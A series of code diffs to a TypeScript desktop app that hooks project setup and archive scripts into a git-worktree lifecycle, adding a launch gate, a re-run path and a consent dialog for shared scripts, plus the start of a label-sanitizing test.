+    consent: async (requestId, answer) => {
+      client.cast(IPC.projectSetupConsentSubmit, requestId, answer)
+    },
+    onConsentRequest: (cb) => client.subscribe(IPC.projectSetupConsentRequest, cb as Listener),
+    onConsentDismiss: (cb) => client.subscribe(IPC.projectSetupConsentDismiss, cb as Listener),
+    onEvent: (projectId, cb) => {
+      const unsub = client.subscribe(IPC.projectSetupEvent(projectId), cb as Listener)
+      client.cast(IPC.projectSetupSubscribe, projectId)
+      return () => {
+        unsub()
+        client.cast(IPC.projectSetupUnsubscribe, projectId)
+      }
+    }
+  }
+
   const settings: SettingsApi = {
     load: () => client.request(IPC.settingsLoad) as Promise<Settings>,
     save: (s: Settings) => client.request(IPC.settingsSave, s) as Promise<void>
@@ -335,7 +364,7 @@ export function buildRealApi(
   // `/worktrees/…` at the filesystem root (the server usually runs as root, and git would create it).
   const userDataDir = (): Promise<string> => client.request(IPC.appUserDataDir) as Promise<string>
 
-  return { pty, workspace, projectSettings, settings, agent, userDataDir }
+  return { pty, workspace, projectSettings, projectSetup, settings, agent, userDataDir }
 }
 
 export function buildGitHubApi(

--- a/src/renderer/canvas/Canvas.tsx
+++ b/src/renderer/canvas/Canvas.tsx
@@ -267,6 +267,7 @@ import {
   pastedFiles
 } from '../terminal/file-drop'
 import { useWorktrees } from '../state/worktrees'
+import { useProjectSetup } from '../state/projectSetup'
 import { activeSessionApi } from '../session/session'
 import {
   agentConfig,
@@ -718,6 +719,31 @@ function StatusAwareMiniMap({ onNodeDoubleClick }: { onNodeDoubleClick: (node: N
       nodeClassName={nodeClassName}
     />
   )
+}
+
+/**
+ * `window.nodeTerminal` rather than the session `api`: the run store's `subscribeProject` listens on
+ * the LOCAL core's channel, so raising a run anywhere else would leave its events unheard — the chip
+ * would sit blank over a script that is really running.
+ */
+function setupApi(): typeof window.nodeTerminal.projectSetup {
+  return window.nodeTerminal.projectSetup
+}
+
+/**
+ * The setup gate an armed node asks about (`PendingLaunch.awaitSetupGroup`): may a node opened into
+ * this worktree frame run its command yet?
+ *
+ * NO ENTRY counts as DONE. The run store is rebuilt from live events, so a group with nothing on
+ * record is either a worktree whose setup never ran or one whose run predates this app start — in
+ * both cases no event is ever coming, and reading that as "still preparing" would strand the node
+ * forever. A FAILED or CANCELLED run is not done: the checkout is in whatever half-state the script
+ * left it, so the node keeps holding its launch until a re-run from the settings panel reports
+ * `done` (or the user fires it by hand from the node's QUEUED badge).
+ */
+function setupDoneForGroup(groupId: string): boolean {
+  const run = useProjectSetup.getState().runForGroup(groupId)
+  return !run || run.state === 'done'
 }
 
 export function Canvas() {
@@ -1301,6 +1327,19 @@ export function Canvas() {
     }
     return sig
   })
+  // The same trick for the OTHER gate: a signature over the setup-run state of every group an armed
+  // node is waiting on, so a run going `done` re-runs the launch effect. Subscribing to the whole
+  // store would re-render the canvas on every output chunk of every script.
+  const armedSetupSig = useProjectSetup((s) => {
+    let sig = ''
+    for (const n of nodesRef.current) {
+      const g = n.data.pendingLaunch?.awaitSetupGroup
+      if (!g) continue
+      const runKey = s.groupRunKey[g]
+      sig += `${n.id}:${g}=${runKey === undefined ? '-' : (s.byRunKey[runKey]?.state ?? '')}|`
+    }
+    return sig
+  })
   // Bumped to re-run the launch effect after a refused delivery (see LAUNCH_RETRY_MS).
   const [launchRetry, setLaunchRetry] = useState(0)
   // Ids whose held launch has been handed to the pty. An id stays here FOREVER once delivery
@@ -1316,7 +1355,8 @@ export function Canvas() {
     const ready = launchesToFire(
       nodes as unknown as ArmedNode[],
       useAgentStatus.getState().byId,
-      live
+      live,
+      setupDoneForGroup
     ).filter((f) => !launchInFlight.current.has(f.id))
     for (const f of ready) {
       launchInFlight.current.add(f.id)
@@ -1340,8 +1380,8 @@ export function Canvas() {
         }
       })
     }
-    // eslint-disable-next-line react-hooks/exhaustive-deps -- armedDepSig/launchRetry are the triggers
-  }, [nodes, armedDepSig, launchRetry])
+    // eslint-disable-next-line react-hooks/exhaustive-deps -- armedDepSig/armedSetupSig/launchRetry are the triggers
+  }, [nodes, armedDepSig, armedSetupSig, launchRetry])
 
   // Selection state for ephemeral nodes (they live outside React Flow's managed nodes), owned by
   // the agent-nodes store so the cards themselves can set it — see `selectable: false` below.
@@ -3899,6 +3939,88 @@ export function Canvas() {
     [setNodes, markDirty, activeProjectId]
   )
 
+  // ---- project setup/archive scripts on the worktree lifecycle ----
+  //
+  // The event channel is per PROJECT and ref-counted in preload, so one subscription per project
+  // covers every worktree of it; the unsubscribes are held here and released on unmount.
+  const setupSubsRef = useRef<Map<string, () => void>>(new Map())
+  // Groups whose CURRENT setup run was acked with `waitForSetup` — the only groups that arm the
+  // nodes opened into them. Runtime-only by design: after a restart there is no run to hear from,
+  // and `launchesToFire`'s probe then reads the missing entry as done rather than stranding a node.
+  const setupWaitGroupsRef = useRef<Set<string>>(new Set())
+  useEffect(
+    () => () => {
+      setupSubsRef.current.forEach((off) => off())
+      setupSubsRef.current.clear()
+    },
+    []
+  )
+  /** Subscribe BEFORE the run is raised — the head of a script's output must not be lost to the
+   *  gap between the ack and the first listener. Idempotent per project. */
+  const ensureSetupSubscription = useCallback((projectId: string): void => {
+    if (setupSubsRef.current.has(projectId)) return
+    setupSubsRef.current.set(projectId, useProjectSetup.getState().subscribeProject(projectId))
+  }, [])
+  /**
+   * Kick a worktree's `setup` script and hand the run to the group's chip. Asked UNCONDITIONALLY:
+   * the service answers `no-script` cheaply, and reading the project's settings here would put a
+   * file read (SSH: a network round-trip) on the hot path of creating a worktree.
+   *
+   * Fire-and-observe — nothing awaits the script. What the ack decides is only (a) which run the
+   * frame's chip reports, and (b) whether nodes opened into this group meanwhile hold their launch.
+   */
+  const startWorktreeSetup = useCallback(
+    (groupId: string, worktreePath: string): void => {
+      const projectId = useProjects.getState().activeProjectId
+      if (!projectId) return
+      ensureSetupSubscription(projectId)
+      void setupApi()
+        .run(projectId, 'setup', worktreePath)
+        .then((res) => {
+          if (res.status !== 'started') {
+            // no-script / declined / unavailable: nothing runs, so nothing may wait on it.
+            setupWaitGroupsRef.current.delete(groupId)
+            return
+          }
+          useProjectSetup.getState().attachGroup(groupId, res.runKey)
+          // Only `waitForSetup` holds launches. Without it the script runs alongside whatever the
+          // user opens — which is the default, and the honest reading of a project that never asked
+          // its collaborators to wait.
+          if (res.waitForSetup) setupWaitGroupsRef.current.add(groupId)
+          else setupWaitGroupsRef.current.delete(groupId)
+        })
+        .catch(() => {
+          setupWaitGroupsRef.current.delete(groupId)
+        })
+    },
+    [ensureSetupSubscription]
+  )
+  /**
+   * Kick the `archive` script for a worktree that is about to be unbound or removed.
+   *
+   * TRADEOFF, deliberate: this awaits the LAUNCH RESULT (`started`/`skipped`) and nothing more. The
+   * script keeps running while the binding is dropped, and its completion is observed through the
+   * store like any other run. Awaiting completion instead would let a hung archive script trap the
+   * user in a group they asked to close — the removal is their decision, not the script's. The cost
+   * is that a slow script can still be writing when a `--delete from disk` removal pulls the
+   * directory out from under it; it then exits non-zero and says so in the chip.
+   */
+  const runWorktreeArchive = useCallback(
+    async (groupId: string, worktreePath: string): Promise<void> => {
+      const projectId = useProjects.getState().activeProjectId
+      if (!projectId) return
+      ensureSetupSubscription(projectId)
+      const res = await setupApi()
+        .run(projectId, 'archive', worktreePath)
+        .catch(() => null)
+      // The group is on its way out, so this attachment only serves the moment the chip is still
+      // on screen — and it must not be left pointing at the finished SETUP run while an archive
+      // script is live.
+      if (res?.status === 'started') useProjectSetup.getState().attachGroup(groupId, res.runKey)
+    },
+    [ensureSetupSubscription]
+  )
+
   /**
    * Everything a group owes the world when its worktree BINDING is dropped — minus the dropping
    * itself, which each caller does its own way (clear `data.worktree`, dissolve the frame, delete
@@ -3928,6 +4050,9 @@ export function Canvas() {
     async (groupId: string): Promise<void> => {
       const wt = nodesRef.current.find((n) => n.id === groupId)?.data.worktree
       if (!wt || isSshProject) return
+      // The project's `archive` script gets its chance BEFORE anything else — this is the one place
+      // every unbinding path passes through. Only the launch is awaited (see `runWorktreeArchive`).
+      await runWorktreeArchive(groupId, wt.path)
       if (!useWorktrees.getState().staleGroupIds.includes(groupId)) return
       resetDisplacedCwd(groupId, wt.path, false)
       // A failed prune must still let the binding go — dropping it is the user's ask, and a
@@ -3936,7 +4061,7 @@ export function Canvas() {
         .worktreeRemove(wt.repoPath, wt.path, false, true)
         .catch(() => {})
     },
-    [isSshProject, resetDisplacedCwd]
+    [isSshProject, resetDisplacedCwd, runWorktreeArchive]
   )
 
   // ---- multi-node actions (context menu) ----
@@ -4227,11 +4352,15 @@ export function Canvas() {
       }
       markDirty()
       refreshWorktreeStore({ bind: { groupId, worktree: wt } })
+      // A fresh checkout is the moment the project's `setup` script exists for: this is the single
+      // shared post-create point (the dialog AND agent-control's open-worktree land here), so the
+      // trigger lives here rather than being repeated — and never diverging — at each caller.
+      startWorktreeSetup(groupId, wt.path)
       // The bound group's id (fresh one when created here) — nodesRef lags setNodes, so
       // callers that need the id (agent-control's open-worktree reply) take it from here.
       return groupId
     },
-    [setNodes, markDirty, viewCenter, refreshWorktreeStore]
+    [setNodes, markDirty, viewCenter, refreshWorktreeStore, startWorktreeSetup]
   )
 
   const createWorktreeAndGroup = useCallback(
@@ -4401,6 +4530,10 @@ export function Canvas() {
       setNotice({ kind: 'info', text: `Unbound ${wt.branch}. The worktree is still on disk.` })
       return
     }
+    // 0) The `archive` script's last chance — after step 1 the directory is gone. Only its LAUNCH is
+    //    awaited (see `runWorktreeArchive`), so a hung script cannot hold the removal hostage; the
+    //    unbind-only branch above gets the same call through `releaseWorktreeBinding`.
+    await runWorktreeArchive(t.groupId, wt.path)
     // 1) Remove the worktree FIRST; only delete the branch if the branch is ours (we created it).
     //    The sessions are killed after, not before: `worktreeRemove` can still REFUSE (a dangerous
     //    path, a locked worktree, EPERM), and killing every child terminal's tmux session up front
@@ -4446,7 +4579,14 @@ export function Canvas() {
     resetDisplacedCwd(t.groupId, wt.path, true)
     clearWorktreeBinding(t.groupId)
     setNotice({ kind: res.ok ? 'info' : 'error', text: res.message })
-  }, [removeTarget, deleteFromDisk, clearWorktreeBinding, resetDisplacedCwd, releaseWorktreeBinding])
+  }, [
+    removeTarget,
+    deleteFromDisk,
+    clearWorktreeBinding,
+    resetDisplacedCwd,
+    releaseWorktreeBinding,
+    runWorktreeArchive
+  ])
 
   // Confirmed merge. The push is passed explicitly: `worktreeMerge` never publishes on its own, so
   // what the dialog said is exactly what runs — and the result banner names the push either way.
@@ -6771,9 +6911,23 @@ export function Canvas() {
       // `extraLive` names nodes being created in this same tick — `verify` arms its judge on
       // reviewers that are not on the canvas yet, and without this they would look DELETED,
       // which counts as satisfied, and the judge would fire before a single review existed.
-      const armAfter = (node: CanvasNode, after: string[], extraLive?: Iterable<string>): CanvasNode => {
+      // `intoGroup` adds the SECOND reason to hold a launch: the node is being opened into a
+      // worktree frame whose project setup script is still preparing the checkout (and said
+      // `waitForSetup`). Same mechanism, same escape hatch on the node — see `awaitSetupGroup`.
+      const armAfter = (
+        node: CanvasNode,
+        after: string[],
+        extraLive?: Iterable<string>,
+        intoGroup?: string | null
+      ): CanvasNode => {
         const command = node.data.initialCommand as string | undefined
-        if (!after.length || !command) return node
+        if (!command) return node
+        // A group only counts while its acked run said `waitForSetup` AND that run has not finished.
+        const awaitSetupGroup =
+          intoGroup && setupWaitGroupsRef.current.has(intoGroup) && !setupDoneForGroup(intoGroup)
+            ? intoGroup
+            : undefined
+        if (!after.length && !awaitSetupGroup) return node
         // If the wait is ALREADY over, don't arm at all — leave the command as the node's
         // `initialCommand` so its own mount path delivers it through `writeWhenShellReady`
         // (which waits for the shell prompt and echo-verifies). Arming would instead hand
@@ -6785,10 +6939,14 @@ export function Canvas() {
           useAgentStatus.getState().byId,
           live
         )
-        if (!unmet.length) return node
+        if (!unmet.length && !awaitSetupGroup) return node
         return {
           ...node,
-          data: { ...node.data, initialCommand: undefined, pendingLaunch: { after, command } }
+          data: {
+            ...node.data,
+            initialCommand: undefined,
+            pendingLaunch: { after, command, ...(awaitSetupGroup ? { awaitSetupGroup } : {}) }
+          }
         }
       }
       // Open `count` nodes INTO a group frame: grow the frame FIRST (extent:'parent' would
@@ -6862,7 +7020,9 @@ export function Canvas() {
                   args.cmd,
                   sshFor(termCwd)
                 ),
-                after ?? []
+                after ?? [],
+                undefined,
+                intoGroupId
               )
             const ids = intoGroupId
               ? addGrouped(intoGroupId, count, make)
@@ -6913,7 +7073,9 @@ export function Canvas() {
                   account,
                   activePermissionMode(agentId)
                 ),
-                after ?? []
+                after ?? [],
+                undefined,
+                intoGroupId
               )
             const ids = intoGroupId
               ? addGrouped(intoGroupId, count, make)

--- a/src/renderer/canvas/Canvas.tsx
+++ b/src/renderer/canvas/Canvas.tsx
@@ -156,6 +156,7 @@ import { PtyPressureBanner } from '../components/PtyPressureBanner'
 import { ConflictBar } from '../components/ConflictBar'
 import { ConfirmDialog } from '../components/ConfirmDialog'
 import { CapabilityNotice } from '../components/CapabilityNotice'
+import { SetupConsentDialog } from '../components/SetupConsentDialog'
 import { ConsentNotice } from '../remote/ConsentNotice'
 import { peerApprovalView } from '@shared/remote/approval'
 import { promptDialog } from '../components/promptDialog'
@@ -9804,6 +9805,12 @@ export function Canvas() {
           every active-project change (the project-load path), is click-only, and records its
           answer machine-locally — see components/CapabilityNotice.tsx and its test. */}
       <CapabilityNotice />
+
+      {/* The trust gate for a git-shared setup/archive script, mounted ONCE for the whole app on
+          the same layer as the clone notice: main raises it (a manual run, or a worktree's setup)
+          and it must be answerable wherever the user is, not only while a settings pane happens to
+          be open — see components/SetupConsentDialog.tsx. */}
+      <SetupConsentDialog />
 
       {confirm && (
         <ConfirmDialog

--- a/src/renderer/canvas/Canvas.tsx
+++ b/src/renderer/canvas/Canvas.tsx
@@ -267,7 +267,7 @@ import {
   pastedFiles
 } from '../terminal/file-drop'
 import { useWorktrees } from '../state/worktrees'
-import { setupGateDone, useProjectSetup } from '../state/projectSetup'
+import { setupAckDecision, setupGateDone, useProjectSetup } from '../state/projectSetup'
 import { activeSessionApi } from '../session/session'
 import {
   agentConfig,
@@ -1312,27 +1312,20 @@ export function Canvas() {
     return sig
   })
   // ---- the setup gate an armed node waits on ----
-  // The two runtime-only facts the gate needs live up here (beside the launch effect that reads
-  // them); the runs themselves are launched from the worktree-lifecycle block far below.
+  // The runs are launched from the worktree-lifecycle block far below; the gate itself lives up
+  // here, beside the launch effect that reads it.
   //
-  // Runtime-only is deliberate for BOTH: after a restart neither a pending launch nor a
-  // wait-for-setup obligation survives, there is no run left to hear from, and `setupGateDone`'s
-  // "nothing on record and nothing pending" rule then releases a persisted arming rather than
-  // stranding it.
-  /** Groups whose setup launch has been REQUESTED but not yet acked. Marked BEFORE the invoke,
-   *  because `projectSetup.run` resolves only after the consent dialog is answered — the window is
-   *  as long as the user takes to read it, and nodes opened into the group meanwhile must wait. */
-  const setupPendingRef = useRef<Set<string>>(new Set())
+  // In-flight launches are counted in the STORE (`pendingByGroup`) rather than in a ref: the frame's
+  // chip reads the same fact to disable itself, and a per-group COUNTER is what makes two overlapping
+  // launches safe (see the store's note). It is runtime-only either way — after a restart neither a
+  // pending launch nor a wait-for-setup obligation survives, and `setupGateDone`'s "nothing on record
+  // and nothing pending" rule then releases a persisted arming rather than stranding it.
   /** Groups whose acked setup run said `waitForSetup` — the ones that arm what is opened into them. */
   const setupWaitGroupsRef = useRef<Set<string>>(new Set())
-  const setupDoneForGroup = useCallback(
-    (groupId: string): boolean =>
-      setupGateDone(
-        useProjectSetup.getState().runForGroup(groupId),
-        setupPendingRef.current.has(groupId)
-      ),
-    []
-  )
+  const setupDoneForGroup = useCallback((groupId: string): boolean => {
+    const s = useProjectSetup.getState()
+    return setupGateDone(s.runForGroup(groupId), s.pendingForGroup(groupId) > 0)
+  }, [])
   // A signature over the setup-run state of every group an armed node is waiting on, so a run going
   // `done` re-runs the launch effect — the same trick as `armedDepSig`. Subscribing to the whole
   // store would re-render the canvas on every output chunk of every script.
@@ -1342,7 +1335,10 @@ export function Canvas() {
       const g = n.data.pendingLaunch?.awaitSetupGroup
       if (!g) continue
       const runKey = s.groupRunKey[g]
-      sig += `${n.id}:${g}=${runKey === undefined ? '-' : (s.byRunKey[runKey]?.state ?? '')}|`
+      // The pending count is part of the signature: an ack that leaves no other trace (a `busy`
+      // one) still changes whether the gate is closed, and the effect has to be told.
+      sig += `${n.id}:${g}=${runKey === undefined ? '-' : (s.byRunKey[runKey]?.state ?? '')}`
+      sig += `+${s.pendingByGroup[g] ?? 0}|`
     }
     return sig
   })
@@ -3997,32 +3993,35 @@ export function Canvas() {
       const projectId = useProjects.getState().activeProjectId
       if (!projectId) return
       ensureSetupSubscription(projectId)
-      // Pending BEFORE the invoke, and cleared on every exit below. `run` resolves only once the
+      // Pending BEFORE the invoke, and cleared on every ack path below. `run` resolves only once the
       // consent dialog has been answered, so this window is human-length, not a round-trip: an
       // agent that gets its `open-worktree` reply and immediately opens nodes into the group lands
       // inside it, and those nodes must wait rather than launch into an unprepared checkout.
-      setupPendingRef.current.add(groupId)
+      const store = useProjectSetup.getState()
+      store.markGroupPending(groupId)
       void setupApi()
         .run(projectId, 'setup', worktreePath)
         .then((res) => {
-          setupPendingRef.current.delete(groupId)
-          if (res.status === 'started') useProjectSetup.getState().attachGroup(groupId, res.runKey)
-          // Only `waitForSetup` holds launches. Without it the script runs alongside whatever the
-          // user opens — the default, and the honest reading of a project that never asked its
-          // collaborators to wait.
-          if (res.status === 'started' && res.waitForSetup) {
+          store.clearGroupPending(groupId)
+          const decision = setupAckDecision(res)
+          if (decision.attach && res.status === 'started') store.attachGroup(groupId, res.runKey)
+          if (decision.hold === 'keep') return // `busy` — another launch owns this run; touch nothing.
+          if (decision.hold === 'wait') {
             setupWaitGroupsRef.current.add(groupId)
             return
           }
           setupWaitGroupsRef.current.delete(groupId)
-          // Nothing to wait for after all (no script, declined, or a script this project runs
-          // unblocked) — so release whatever the pending window armed. Without this a node from
-          // that window would hold on a run whose completion the gate only accepts as `done`, and
-          // a run that FAILS never gets there.
+          // Nothing is going to prepare this checkout, or the project runs its script unblocked —
+          // so release whatever the in-flight window armed. Without this such a node would hold for
+          // a `done` that either is not coming or was never meant to gate it.
           releaseSetupArming(groupId)
         })
         .catch(() => {
-          setupPendingRef.current.delete(groupId)
+          store.clearGroupPending(groupId)
+          // A rejected invoke says nothing about a launch that may be running for this group from
+          // another click — give up the hold only when nobody else is still working on it.
+          const s = useProjectSetup.getState()
+          if (s.pendingForGroup(groupId) > 0 || s.runForGroup(groupId)?.state === 'running') return
           setupWaitGroupsRef.current.delete(groupId)
           releaseSetupArming(groupId)
         })
@@ -6981,7 +6980,8 @@ export function Canvas() {
         // releases these again) or while its acked run said `waitForSetup` and has not finished.
         const holdsForSetup =
           !!intoGroup &&
-          (setupPendingRef.current.has(intoGroup) || setupWaitGroupsRef.current.has(intoGroup)) &&
+          (useProjectSetup.getState().pendingForGroup(intoGroup) > 0 ||
+            setupWaitGroupsRef.current.has(intoGroup)) &&
           !setupDoneForGroup(intoGroup)
         const awaitSetupGroup = holdsForSetup ? intoGroup ?? undefined : undefined
         if (!after.length && !awaitSetupGroup) return node

--- a/src/renderer/canvas/Canvas.tsx
+++ b/src/renderer/canvas/Canvas.tsx
@@ -267,7 +267,7 @@ import {
   pastedFiles
 } from '../terminal/file-drop'
 import { useWorktrees } from '../state/worktrees'
-import { useProjectSetup } from '../state/projectSetup'
+import { setupGateDone, useProjectSetup } from '../state/projectSetup'
 import { activeSessionApi } from '../session/session'
 import {
   agentConfig,
@@ -728,22 +728,6 @@ function StatusAwareMiniMap({ onNodeDoubleClick }: { onNodeDoubleClick: (node: N
  */
 function setupApi(): typeof window.nodeTerminal.projectSetup {
   return window.nodeTerminal.projectSetup
-}
-
-/**
- * The setup gate an armed node asks about (`PendingLaunch.awaitSetupGroup`): may a node opened into
- * this worktree frame run its command yet?
- *
- * NO ENTRY counts as DONE. The run store is rebuilt from live events, so a group with nothing on
- * record is either a worktree whose setup never ran or one whose run predates this app start — in
- * both cases no event is ever coming, and reading that as "still preparing" would strand the node
- * forever. A FAILED or CANCELLED run is not done: the checkout is in whatever half-state the script
- * left it, so the node keeps holding its launch until a re-run from the settings panel reports
- * `done` (or the user fires it by hand from the node's QUEUED badge).
- */
-function setupDoneForGroup(groupId: string): boolean {
-  const run = useProjectSetup.getState().runForGroup(groupId)
-  return !run || run.state === 'done'
 }
 
 export function Canvas() {
@@ -1327,8 +1311,30 @@ export function Canvas() {
     }
     return sig
   })
-  // The same trick for the OTHER gate: a signature over the setup-run state of every group an armed
-  // node is waiting on, so a run going `done` re-runs the launch effect. Subscribing to the whole
+  // ---- the setup gate an armed node waits on ----
+  // The two runtime-only facts the gate needs live up here (beside the launch effect that reads
+  // them); the runs themselves are launched from the worktree-lifecycle block far below.
+  //
+  // Runtime-only is deliberate for BOTH: after a restart neither a pending launch nor a
+  // wait-for-setup obligation survives, there is no run left to hear from, and `setupGateDone`'s
+  // "nothing on record and nothing pending" rule then releases a persisted arming rather than
+  // stranding it.
+  /** Groups whose setup launch has been REQUESTED but not yet acked. Marked BEFORE the invoke,
+   *  because `projectSetup.run` resolves only after the consent dialog is answered — the window is
+   *  as long as the user takes to read it, and nodes opened into the group meanwhile must wait. */
+  const setupPendingRef = useRef<Set<string>>(new Set())
+  /** Groups whose acked setup run said `waitForSetup` — the ones that arm what is opened into them. */
+  const setupWaitGroupsRef = useRef<Set<string>>(new Set())
+  const setupDoneForGroup = useCallback(
+    (groupId: string): boolean =>
+      setupGateDone(
+        useProjectSetup.getState().runForGroup(groupId),
+        setupPendingRef.current.has(groupId)
+      ),
+    []
+  )
+  // A signature over the setup-run state of every group an armed node is waiting on, so a run going
+  // `done` re-runs the launch effect — the same trick as `armedDepSig`. Subscribing to the whole
   // store would re-render the canvas on every output chunk of every script.
   const armedSetupSig = useProjectSetup((s) => {
     let sig = ''
@@ -3944,10 +3950,6 @@ export function Canvas() {
   // The event channel is per PROJECT and ref-counted in preload, so one subscription per project
   // covers every worktree of it; the unsubscribes are held here and released on unmount.
   const setupSubsRef = useRef<Map<string, () => void>>(new Map())
-  // Groups whose CURRENT setup run was acked with `waitForSetup` — the only groups that arm the
-  // nodes opened into them. Runtime-only by design: after a restart there is no run to hear from,
-  // and `launchesToFire`'s probe then reads the missing entry as done rather than stranding a node.
-  const setupWaitGroupsRef = useRef<Set<string>>(new Set())
   useEffect(
     () => () => {
       setupSubsRef.current.forEach((off) => off())
@@ -3961,6 +3963,23 @@ export function Canvas() {
     if (setupSubsRef.current.has(projectId)) return
     setupSubsRef.current.set(projectId, useProjectSetup.getState().subscribeProject(projectId))
   }, [])
+  /** Drop the SETUP half of the hold on every node armed for this group, leaving its `after` deps
+   *  (if any) to decide. The launch effect re-runs on the `nodes` change and fires what is now free. */
+  const releaseSetupArming = useCallback(
+    (groupId: string): void => {
+      if (!nodesRef.current.some((n) => n.data.pendingLaunch?.awaitSetupGroup === groupId)) return
+      setNodes((ns) =>
+        ns.map((n) => {
+          const p = n.data.pendingLaunch
+          if (p?.awaitSetupGroup !== groupId) return n
+          const { awaitSetupGroup: _released, ...rest } = p
+          return { ...n, data: { ...n.data, pendingLaunch: rest } }
+        })
+      )
+      markDirty()
+    },
+    [setNodes, markDirty]
+  )
   /**
    * Kick a worktree's `setup` script and hand the run to the group's chip. Asked UNCONDITIONALLY:
    * the service answers `no-script` cheaply, and reading the project's settings here would put a
@@ -3968,42 +3987,61 @@ export function Canvas() {
    *
    * Fire-and-observe — nothing awaits the script. What the ack decides is only (a) which run the
    * frame's chip reports, and (b) whether nodes opened into this group meanwhile hold their launch.
+   *
+   * Also the RE-RUN path: the frame's chip calls this again on a failed run, and the new ack
+   * re-attaches the group's lane, which is what releases nodes the failure left armed. (The settings
+   * panel's Run cannot do this — it runs at the project ROOT and attaches the PROJECT lane.)
    */
   const startWorktreeSetup = useCallback(
     (groupId: string, worktreePath: string): void => {
       const projectId = useProjects.getState().activeProjectId
       if (!projectId) return
       ensureSetupSubscription(projectId)
+      // Pending BEFORE the invoke, and cleared on every exit below. `run` resolves only once the
+      // consent dialog has been answered, so this window is human-length, not a round-trip: an
+      // agent that gets its `open-worktree` reply and immediately opens nodes into the group lands
+      // inside it, and those nodes must wait rather than launch into an unprepared checkout.
+      setupPendingRef.current.add(groupId)
       void setupApi()
         .run(projectId, 'setup', worktreePath)
         .then((res) => {
-          if (res.status !== 'started') {
-            // no-script / declined / unavailable: nothing runs, so nothing may wait on it.
-            setupWaitGroupsRef.current.delete(groupId)
+          setupPendingRef.current.delete(groupId)
+          if (res.status === 'started') useProjectSetup.getState().attachGroup(groupId, res.runKey)
+          // Only `waitForSetup` holds launches. Without it the script runs alongside whatever the
+          // user opens — the default, and the honest reading of a project that never asked its
+          // collaborators to wait.
+          if (res.status === 'started' && res.waitForSetup) {
+            setupWaitGroupsRef.current.add(groupId)
             return
           }
-          useProjectSetup.getState().attachGroup(groupId, res.runKey)
-          // Only `waitForSetup` holds launches. Without it the script runs alongside whatever the
-          // user opens — which is the default, and the honest reading of a project that never asked
-          // its collaborators to wait.
-          if (res.waitForSetup) setupWaitGroupsRef.current.add(groupId)
-          else setupWaitGroupsRef.current.delete(groupId)
+          setupWaitGroupsRef.current.delete(groupId)
+          // Nothing to wait for after all (no script, declined, or a script this project runs
+          // unblocked) — so release whatever the pending window armed. Without this a node from
+          // that window would hold on a run whose completion the gate only accepts as `done`, and
+          // a run that FAILS never gets there.
+          releaseSetupArming(groupId)
         })
         .catch(() => {
+          setupPendingRef.current.delete(groupId)
           setupWaitGroupsRef.current.delete(groupId)
+          releaseSetupArming(groupId)
         })
     },
-    [ensureSetupSubscription]
+    [ensureSetupSubscription, releaseSetupArming]
   )
   /**
    * Kick the `archive` script for a worktree that is about to be unbound or removed.
    *
-   * TRADEOFF, deliberate: this awaits the LAUNCH RESULT (`started`/`skipped`) and nothing more. The
-   * script keeps running while the binding is dropped, and its completion is observed through the
-   * store like any other run. Awaiting completion instead would let a hung archive script trap the
-   * user in a group they asked to close — the removal is their decision, not the script's. The cost
-   * is that a slow script can still be writing when a `--delete from disk` removal pulls the
-   * directory out from under it; it then exits non-zero and says so in the chip.
+   * TRADEOFF, deliberate: this awaits the LAUNCH RESULT (`started`/`skipped`) and nothing more.
+   * Awaiting completion would let a hung archive script trap the user in a group they asked to close
+   * — the removal is their decision, not the script's.
+   *
+   * The cost is real and currently UNSURFACED: the script keeps running after the binding drops, so
+   * the frame that would have shown its chip is already gone, and a slow script can still be writing
+   * when a delete-from-disk removal pulls the directory out from under it. Its outcome — including
+   * that failure — is recorded in the run store but has nowhere on screen to appear. Giving archive
+   * runs an observable home belongs to the observability wave, not here; until then this is a
+   * fire-and-forget in practice, and the comment says so rather than promising a chip nobody sees.
    */
   const runWorktreeArchive = useCallback(
     async (groupId: string, worktreePath: string): Promise<void> => {
@@ -4613,7 +4651,7 @@ export function Canvas() {
   // merge / remove teardown actions (Tasks 8 & 9) slot in as new cases. `unbind` forgets the
   // binding without touching disk; `merge` merges to base; `remove` opens the safety dialog.
   const onWorktreeAction = useCallback(
-    (groupId: string, action: 'merge' | 'remove' | 'unbind') => {
+    (groupId: string, action: 'merge' | 'remove' | 'unbind' | 'rerun-setup') => {
       // A binding can only predate the SSH gate (hand-edited project file, or a project that became
       // an SSH project), but it can still exist — and merge/remove would run against the LOCAL
       // filesystem for a project whose git and terminals live on the remote host. Refuse them, out
@@ -4669,11 +4707,27 @@ export function Canvas() {
             if (!res.ok && res.error) setNotice({ kind: 'error', text: res.error })
           })
           break
+        case 'rerun-setup': {
+          // The failed-setup chip. This is the ONLY re-run that can clear a worktree group's failed
+          // run and release the nodes it left armed: it runs at the WORKTREE path and its ack
+          // re-attaches THIS group's lane. The settings panel's Run does neither (project root,
+          // project lane), which is why the chip does not merely point at it.
+          const wt = nodesRef.current.find((n) => n.id === groupId)?.data.worktree
+          if (!wt) return
+          startWorktreeSetup(groupId, wt.path)
+          break
+        }
         default:
           break
       }
     },
-    [requestRemoveWorktree, clearWorktreeBinding, releaseWorktreeBinding, activeProjectId]
+    [
+      requestRemoveWorktree,
+      clearWorktreeBinding,
+      releaseWorktreeBinding,
+      activeProjectId,
+      startWorktreeSetup
+    ]
   )
 
   // Bridge the worktree-action handler to GroupNode (which React Flow instantiates itself).
@@ -6922,11 +6976,14 @@ export function Canvas() {
       ): CanvasNode => {
         const command = node.data.initialCommand as string | undefined
         if (!command) return node
-        // A group only counts while its acked run said `waitForSetup` AND that run has not finished.
-        const awaitSetupGroup =
-          intoGroup && setupWaitGroupsRef.current.has(intoGroup) && !setupDoneForGroup(intoGroup)
-            ? intoGroup
-            : undefined
+        // A group counts while its launch is still PENDING (the ack — and with it `waitForSetup` —
+        // has not come back yet; holding is the safe side of that unknown, and a non-waiting ack
+        // releases these again) or while its acked run said `waitForSetup` and has not finished.
+        const holdsForSetup =
+          !!intoGroup &&
+          (setupPendingRef.current.has(intoGroup) || setupWaitGroupsRef.current.has(intoGroup)) &&
+          !setupDoneForGroup(intoGroup)
+        const awaitSetupGroup = holdsForSetup ? intoGroup ?? undefined : undefined
         if (!after.length && !awaitSetupGroup) return node
         // If the wait is ALREADY over, don't arm at all — leave the command as the node's
         // `initialCommand` so its own mount path delivers it through `writeWhenShellReady`

--- a/src/renderer/components/SetupConsentDialog.test.tsx
+++ b/src/renderer/components/SetupConsentDialog.test.tsx
@@ -257,6 +257,40 @@ describe('SetupConsentDialog', () => {
     expect(shown).toContain('\u2026')
   })
 
+  it('I2: strips BIDI OVERRIDES and zero-width marks from the labels — a name must not misrender', () => {
+    mount()
+    act(() =>
+      emitRequest(
+        request({
